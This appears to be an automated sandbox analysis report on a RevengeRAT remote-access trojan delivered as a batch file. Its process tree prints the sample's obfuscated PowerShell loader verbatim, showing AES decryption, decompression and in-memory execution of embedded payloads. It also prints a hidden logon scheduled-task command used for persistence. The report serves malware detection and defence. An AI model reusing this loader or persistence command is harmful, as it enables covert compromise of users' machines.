revengerat | 8ef692bc1808ce731aebee08f730c9d0a5b6d4695dafab2d420201247f717fc8

Analysis

max time kernel
28s
max time network
18s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
11/06/2024, 05:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Client.bat
Size

286KB
MD5

63c935a02276c2876f0f40f6ca93de5b
SHA1

06f5951a19367f0d348c0ba4055b42aa2ffcc724
SHA256

8ef692bc1808ce731aebee08f730c9d0a5b6d4695dafab2d420201247f717fc8
SHA512

be0cc7ac331c5613cb567749e0d1b76730620fbb6440a9a2a4a4bfdc719fdd49e466b2685fe0133e77e794f1c49bf7cdcca391e564b3ca8979c5ed6529adae79
SSDEEP

6144:P2xqkImYc6Cyaf3OXrio+jPv1Ra4LfIb55oXNs7attGR9:+qgVylXrio+Tt4rN5ci7a2R9

Score

10^/10

revengerat execution stealer trojan

Malware Config

Signatures

RevengeRAT
Remote-access trojan with a wide range of capabilities.
trojan revengerat

RevengeRat Executable 1 IoCs

stealer

resource	yara_rule
behavioral2/memory/2924-257-0x000001E6F3710000-0x000001E6F3724000-memory.dmp	revengerat

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1300	powershell.exe
800	powershell.exe
2924	powershell.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File created	C:\Windows\system32\SleepStudy\user-not-present-trace-2024-06-11-05-16-05.etl	svchost.exe
File opened for modification	C:\Windows\system32\SleepStudy\user-not-present-trace-2024-06-11-05-16-05.etl	svchost.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings	powershell.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 20 IoCs

pid	Process
1300	powershell.exe
1300	powershell.exe
1300	powershell.exe
800	powershell.exe
800	powershell.exe
800	powershell.exe
2924	powershell.exe
2924	powershell.exe
2924	powershell.exe
2924	powershell.exe
2924	powershell.exe
2924	powershell.exe
2924	powershell.exe
2924	powershell.exe
2924	powershell.exe
2924	powershell.exe
2924	powershell.exe
2924	powershell.exe
2924	powershell.exe
2924	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3348	Explorer.EXE

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1300	powershell.exe
Token: SeDebugPrivilege	800	powershell.exe
Token: SeIncreaseQuotaPrivilege	800	powershell.exe
Token: SeSecurityPrivilege	800	powershell.exe
Token: SeTakeOwnershipPrivilege	800	powershell.exe
Token: SeLoadDriverPrivilege	800	powershell.exe
Token: SeSystemProfilePrivilege	800	powershell.exe
Token: SeSystemtimePrivilege	800	powershell.exe
Token: SeProfSingleProcessPrivilege	800	powershell.exe
Token: SeIncBasePriorityPrivilege	800	powershell.exe
Token: SeCreatePagefilePrivilege	800	powershell.exe
Token: SeBackupPrivilege	800	powershell.exe
Token: SeRestorePrivilege	800	powershell.exe
Token: SeShutdownPrivilege	800	powershell.exe
Token: SeDebugPrivilege	800	powershell.exe
Token: SeSystemEnvironmentPrivilege	800	powershell.exe
Token: SeRemoteShutdownPrivilege	800	powershell.exe
Token: SeUndockPrivilege	800	powershell.exe
Token: SeManageVolumePrivilege	800	powershell.exe
Token: 33	800	powershell.exe
Token: 34	800	powershell.exe
Token: 35	800	powershell.exe
Token: 36	800	powershell.exe
Token: SeIncreaseQuotaPrivilege	800	powershell.exe
Token: SeSecurityPrivilege	800	powershell.exe
Token: SeTakeOwnershipPrivilege	800	powershell.exe
Token: SeLoadDriverPrivilege	800	powershell.exe
Token: SeSystemProfilePrivilege	800	powershell.exe
Token: SeSystemtimePrivilege	800	powershell.exe
Token: SeProfSingleProcessPrivilege	800	powershell.exe
Token: SeIncBasePriorityPrivilege	800	powershell.exe
Token: SeCreatePagefilePrivilege	800	powershell.exe
Token: SeBackupPrivilege	800	powershell.exe
Token: SeRestorePrivilege	800	powershell.exe
Token: SeShutdownPrivilege	800	powershell.exe
Token: SeDebugPrivilege	800	powershell.exe
Token: SeSystemEnvironmentPrivilege	800	powershell.exe
Token: SeRemoteShutdownPrivilege	800	powershell.exe
Token: SeUndockPrivilege	800	powershell.exe
Token: SeManageVolumePrivilege	800	powershell.exe
Token: 33	800	powershell.exe
Token: 34	800	powershell.exe
Token: 35	800	powershell.exe
Token: 36	800	powershell.exe
Token: SeIncreaseQuotaPrivilege	800	powershell.exe
Token: SeSecurityPrivilege	800	powershell.exe
Token: SeTakeOwnershipPrivilege	800	powershell.exe
Token: SeLoadDriverPrivilege	800	powershell.exe
Token: SeSystemProfilePrivilege	800	powershell.exe
Token: SeSystemtimePrivilege	800	powershell.exe
Token: SeProfSingleProcessPrivilege	800	powershell.exe
Token: SeIncBasePriorityPrivilege	800	powershell.exe
Token: SeCreatePagefilePrivilege	800	powershell.exe
Token: SeBackupPrivilege	800	powershell.exe
Token: SeRestorePrivilege	800	powershell.exe
Token: SeShutdownPrivilege	800	powershell.exe
Token: SeDebugPrivilege	800	powershell.exe
Token: SeSystemEnvironmentPrivilege	800	powershell.exe
Token: SeRemoteShutdownPrivilege	800	powershell.exe
Token: SeUndockPrivilege	800	powershell.exe
Token: SeManageVolumePrivilege	800	powershell.exe
Token: 33	800	powershell.exe
Token: 34	800	powershell.exe
Token: 35	800	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2872 wrote to memory of 4580	2872	cmd.exe	74
PID 2872 wrote to memory of 4580	2872	cmd.exe	74
PID 4580 wrote to memory of 4020	4580	net.exe	75
PID 4580 wrote to memory of 4020	4580	net.exe	75
PID 2872 wrote to memory of 832	2872	cmd.exe	76
PID 2872 wrote to memory of 832	2872	cmd.exe	76
PID 2872 wrote to memory of 1300	2872	cmd.exe	77
PID 2872 wrote to memory of 1300	2872	cmd.exe	77
PID 1300 wrote to memory of 800	1300	powershell.exe	78
PID 1300 wrote to memory of 800	1300	powershell.exe	78
PID 1300 wrote to memory of 1724	1300	powershell.exe	81
PID 1300 wrote to memory of 1724	1300	powershell.exe	81
PID 1724 wrote to memory of 8	1724	WScript.exe	82
PID 1724 wrote to memory of 8	1724	WScript.exe	82
PID 8 wrote to memory of 5008	8	cmd.exe	84
PID 8 wrote to memory of 5008	8	cmd.exe	84
PID 5008 wrote to memory of 3328	5008	net.exe	85
PID 5008 wrote to memory of 3328	5008	net.exe	85
PID 8 wrote to memory of 5048	8	cmd.exe	86
PID 8 wrote to memory of 5048	8	cmd.exe	86
PID 8 wrote to memory of 2924	8	cmd.exe	87
PID 8 wrote to memory of 2924	8	cmd.exe	87
PID 2924 wrote to memory of 3348	2924	powershell.exe	54
PID 2924 wrote to memory of 2556	2924	powershell.exe	44
PID 2924 wrote to memory of 976	2924	powershell.exe	17
PID 2924 wrote to memory of 1172	2924	powershell.exe	21
PID 2924 wrote to memory of 1544	2924	powershell.exe	29
PID 2924 wrote to memory of 1344	2924	powershell.exe	25
PID 2924 wrote to memory of 356	2924	powershell.exe	15
PID 2924 wrote to memory of 1336	2924	powershell.exe	24
PID 2924 wrote to memory of 2320	2924	powershell.exe	41
PID 2924 wrote to memory of 3096	2924	powershell.exe	51
PID 2924 wrote to memory of 1716	2924	powershell.exe	32
PID 2924 wrote to memory of 728	2924	powershell.exe	8
PID 2924 wrote to memory of 1532	2924	powershell.exe	28
PID 2924 wrote to memory of 2296	2924	powershell.exe	40
PID 2924 wrote to memory of 1900	2924	powershell.exe	36
PID 2924 wrote to memory of 620	2924	powershell.exe	16
PID 2924 wrote to memory of 4060	2924	powershell.exe	63
PID 2924 wrote to memory of 2088	2924	powershell.exe	39
PID 2924 wrote to memory of 1496	2924	powershell.exe	27
PID 2924 wrote to memory of 904	2924	powershell.exe	13
PID 2924 wrote to memory of 1884	2924	powershell.exe	35
PID 2924 wrote to memory of 2472	2924	powershell.exe	43
PID 2924 wrote to memory of 2344	2924	powershell.exe	42
PID 2924 wrote to memory of 1088	2924	powershell.exe	20
PID 2924 wrote to memory of 2064	2924	powershell.exe	38
PID 2924 wrote to memory of 1592	2924	powershell.exe	30
PID 2924 wrote to memory of 1072	2924	powershell.exe	19
PID 2924 wrote to memory of 864	2924	powershell.exe	12
PID 2924 wrote to memory of 4728	2924	powershell.exe	60
PID 2924 wrote to memory of 1648	2924	powershell.exe	31
PID 2924 wrote to memory of 1056	2924	powershell.exe	18
PID 2924 wrote to memory of 4992	2924	powershell.exe	62
PID 2924 wrote to memory of 1248	2924	powershell.exe	22
PID 2924 wrote to memory of 3216	2924	powershell.exe	53
PID 2924 wrote to memory of 2616	2924	powershell.exe	48
PID 2924 wrote to memory of 2608	2924	powershell.exe	47
PID 2924 wrote to memory of 4572	2924	powershell.exe	65
PID 2924 wrote to memory of 1408	2924	powershell.exe	26
PID 2924 wrote to memory of 816	2924	powershell.exe	11
PID 2924 wrote to memory of 1800	2924	powershell.exe	34
PID 2924 wrote to memory of 1788	2924	powershell.exe	33
PID 2924 wrote to memory of 2564	2924	powershell.exe	45

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay
1⤵
PID:728

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
1⤵
- Drops file in System32 directory
PID:816

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k rpcss
1⤵
PID:864

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s LSM
1⤵
PID:904

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
1⤵
PID:356

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts
1⤵
PID:620

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService
1⤵
PID:976

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog
1⤵
PID:1056

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
1⤵
PID:1072

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Schedule
1⤵
PID:1088

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s nsi
1⤵
PID:1172

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
1⤵
PID:1248

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp
1⤵
PID:1276

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Themes
1⤵
PID:1336

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s EventSystem
1⤵
PID:1344

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s UserManager
1⤵
PID:1408

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s NlaSvc
1⤵
PID:1496

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s SENS
1⤵
PID:1532

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s Dnscache
1⤵
PID:1544

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder
1⤵
PID:1592

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s netprofm
1⤵
PID:1648

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1716

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1788

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1800

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
1⤵
PID:1884

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s StateRepository
1⤵
PID:1900

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation
1⤵
PID:2064

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
1⤵
PID:2088

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
1⤵
PID:2296

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent
1⤵
PID:2320

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
1⤵
PID:2344

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc
1⤵
PID:2472

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Browser
1⤵
PID:2556

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s CryptSvc
1⤵
PID:2564

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks
1⤵
PID:2608

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s WpnService
1⤵
PID:2616

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
1⤵
PID:3096

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s TokenBroker
1⤵
PID:3216

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: GetForegroundWindowSpam
PID:3348
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Client.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2872
- - C:\Windows\system32\net.exe
    net file
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4580
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 file
      4⤵
      PID:4020
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vUD33ojbuK5qcJP0aHOsz+UQ2Xco8FPhu/tJAikRbUw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ezvKJ197aUaeoNaZ7EnUWg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $nXpVF=New-Object System.IO.MemoryStream(,$param_var); $cpMTV=New-Object System.IO.MemoryStream; $CTTbn=New-Object System.IO.Compression.GZipStream($nXpVF, [IO.Compression.CompressionMode]::Decompress); $CTTbn.CopyTo($cpMTV); $CTTbn.Dispose(); $nXpVF.Dispose(); $cpMTV.Dispose(); $cpMTV.ToArray();}function execute_function($param_var,$param2_var){ $joTzJ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $rUNvT=$joTzJ.EntryPoint; $rUNvT.Invoke($null, $param2_var);}$roMlk = 'C:\Users\Admin\AppData\Local\Temp\Client.bat';$host.UI.RawUI.WindowTitle = $roMlk;$vrXeC=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($roMlk).Split([Environment]::NewLine);foreach ($iHPLf in $vrXeC) { if ($iHPLf.StartsWith('OMbuGMngZwfFIXvfXjdn')) { $uKYUX=$iHPLf.Substring(20); break; }}$payloads_var=[string[]]$uKYUX.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
    3⤵
    PID:832
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1300
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_253_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_253.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:800
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_253.vbs"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1724
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_253.bat" "
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:8
      - C:\Windows\system32\net.exe
        
        net file
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:5008
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        7⤵
        
        PID:3328
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vUD33ojbuK5qcJP0aHOsz+UQ2Xco8FPhu/tJAikRbUw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ezvKJ197aUaeoNaZ7EnUWg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $nXpVF=New-Object System.IO.MemoryStream(,$param_var); $cpMTV=New-Object System.IO.MemoryStream; $CTTbn=New-Object System.IO.Compression.GZipStream($nXpVF, [IO.Compression.CompressionMode]::Decompress); $CTTbn.CopyTo($cpMTV); $CTTbn.Dispose(); $nXpVF.Dispose(); $cpMTV.Dispose(); $cpMTV.ToArray();}function execute_function($param_var,$param2_var){ $joTzJ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $rUNvT=$joTzJ.EntryPoint; $rUNvT.Invoke($null, $param2_var);}$roMlk = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_253.bat';$host.UI.RawUI.WindowTitle = $roMlk;$vrXeC=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($roMlk).Split([Environment]::NewLine);foreach ($iHPLf in $vrXeC) { if ($iHPLf.StartsWith('OMbuGMngZwfFIXvfXjdn')) { $uKYUX=$iHPLf.Substring(20); break; }}$payloads_var=[string[]]$uKYUX.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
        6⤵
        
        PID:5048
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:2924

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s CDPSvc
1⤵
PID:4728

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV
1⤵
PID:4992

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
1⤵
PID:4060

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc
1⤵
PID:4572

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
ad5cd538ca58cb28ede39c108acb5785

SHA1
1ae910026f3dbe90ed025e9e96ead2b5399be877

SHA256
c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033

SHA512
c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
2KB

MD5
0c5e88a4caea8e923669432728c9e72a

SHA1
e60fccf3ce98fc793b2afa3a9c492f127dbeca19

SHA256
bf9f4cc8441f5ae4dbdc556149e36920fd3787c7856993ddd2bd65a37e9ca17d

SHA512
7928bc1dcf2c1f5bd9b1555670fc400dd6815dbe00fdb5d3eb0f0db094a550feb567ef6750914889b5df5f7fe129b73b2b57d3c87b9ecc7ca09c6b06d16e1717

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ezrccvwl.kwp.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Roaming\$phantom-startup_str_253.bat

Filesize
286KB

MD5
63c935a02276c2876f0f40f6ca93de5b

SHA1
06f5951a19367f0d348c0ba4055b42aa2ffcc724

SHA256
8ef692bc1808ce731aebee08f730c9d0a5b6d4695dafab2d420201247f717fc8

SHA512
be0cc7ac331c5613cb567749e0d1b76730620fbb6440a9a2a4a4bfdc719fdd49e466b2685fe0133e77e794f1c49bf7cdcca391e564b3ca8979c5ed6529adae79

Download Submit
C:\Users\Admin\AppData\Roaming\$phantom-startup_str_253.vbs

Filesize
124B

MD5
adb4e7e96aefc67b94bb3e676915774e

SHA1
6baba5a6b240e6336b9a283645bc513857ba14f2

SHA256
8490327819d06cc08f4fa60fccee5fc6a2f35a5ab0750c077ff7abd626f751d9

SHA512
42b71e3f12064086602de088e2142afa7b05b4853ba8c1c739c333582779ccada58b648d96e499a411b44a5aa8367859279bbd473c8ea3e15aae487a2737e4cd

Download Submit
memory/356-232-0x00007FFCD5240000-0x00007FFCD5250000-memory.dmp

Filesize
64KB

Download
memory/800-69-0x00007FFCF86F0000-0x00007FFCF90DC000-memory.dmp

Filesize
9.9MB

Download
memory/800-103-0x00007FFCF86F0000-0x00007FFCF90DC000-memory.dmp

Filesize
9.9MB

Download
memory/800-72-0x00007FFCF86F0000-0x00007FFCF90DC000-memory.dmp

Filesize
9.9MB

Download
memory/800-70-0x00007FFCF86F0000-0x00007FFCF90DC000-memory.dmp

Filesize
9.9MB

Download
memory/904-222-0x00007FFCD5240000-0x00007FFCD5250000-memory.dmp

Filesize
64KB

Download
memory/976-221-0x00007FFCD5240000-0x00007FFCD5250000-memory.dmp

Filesize
64KB

Download
memory/1056-220-0x00007FFCD5240000-0x00007FFCD5250000-memory.dmp

Filesize
64KB

Download
memory/1248-224-0x00007FFCD5240000-0x00007FFCD5250000-memory.dmp

Filesize
64KB

Download
memory/1300-47-0x000001A340010000-0x000001A340086000-memory.dmp

Filesize
472KB

Download
memory/1300-58-0x000001A33FFC0000-0x000001A33FFF8000-memory.dmp

Filesize
224KB

Download
memory/1300-57-0x000001A33FF10000-0x000001A33FF18000-memory.dmp

Filesize
32KB

Download
memory/1300-56-0x00007FFCF86F0000-0x00007FFCF90DC000-memory.dmp

Filesize
9.9MB

Download
memory/1300-251-0x00007FFCF86F0000-0x00007FFCF90DC000-memory.dmp

Filesize
9.9MB

Download
memory/1300-36-0x000001A33FF40000-0x000001A33FF7C000-memory.dmp

Filesize
240KB

Download
memory/1300-4-0x00007FFCF86F3000-0x00007FFCF86F4000-memory.dmp

Filesize
4KB

Download
memory/1300-11-0x00007FFCF86F0000-0x00007FFCF90DC000-memory.dmp

Filesize
9.9MB

Download
memory/1300-9-0x00007FFCF86F0000-0x00007FFCF90DC000-memory.dmp

Filesize
9.9MB

Download
memory/1300-7-0x000001A33FE80000-0x000001A33FEA2000-memory.dmp

Filesize
136KB

Download
memory/1336-231-0x00007FFCD5240000-0x00007FFCD5250000-memory.dmp

Filesize
64KB

Download
memory/1344-230-0x00007FFCD5240000-0x00007FFCD5250000-memory.dmp

Filesize
64KB

Download
memory/1408-227-0x00007FFCD5240000-0x00007FFCD5250000-memory.dmp

Filesize
64KB

Download
memory/1496-216-0x00007FFCD5240000-0x00007FFCD5250000-memory.dmp

Filesize
64KB

Download
memory/1544-214-0x00007FFCD5240000-0x00007FFCD5250000-memory.dmp

Filesize
64KB

Download
memory/1648-217-0x00007FFCD5240000-0x00007FFCD5250000-memory.dmp

Filesize
64KB

Download
memory/1800-228-0x00007FFCD5240000-0x00007FFCD5250000-memory.dmp

Filesize
64KB

Download
memory/1884-215-0x00007FFCD5240000-0x00007FFCD5250000-memory.dmp

Filesize
64KB

Download
memory/2472-223-0x00007FFCD5240000-0x00007FFCD5250000-memory.dmp

Filesize
64KB

Download
memory/2556-212-0x00007FFCD5240000-0x00007FFCD5250000-memory.dmp

Filesize
64KB

Download
memory/2564-229-0x00007FFCD5240000-0x00007FFCD5250000-memory.dmp

Filesize
64KB

Download
memory/2616-226-0x00007FFCD5240000-0x00007FFCD5250000-memory.dmp

Filesize
64KB

Download
memory/2924-257-0x000001E6F3710000-0x000001E6F3724000-memory.dmp

Filesize
80KB

Download
memory/3216-225-0x00007FFCD5240000-0x00007FFCD5250000-memory.dmp

Filesize
64KB

Download
memory/3348-213-0x00007FFCD5240000-0x00007FFCD5250000-memory.dmp

Filesize
64KB

Download
memory/3348-167-0x00000000011F0000-0x000000000121A000-memory.dmp

Filesize
168KB

Download
memory/4572-219-0x00007FFCD5240000-0x00007FFCD5250000-memory.dmp

Filesize
64KB

Download
memory/4992-218-0x00007FFCD5240000-0x00007FFCD5250000-memory.dmp

Filesize
64KB

Download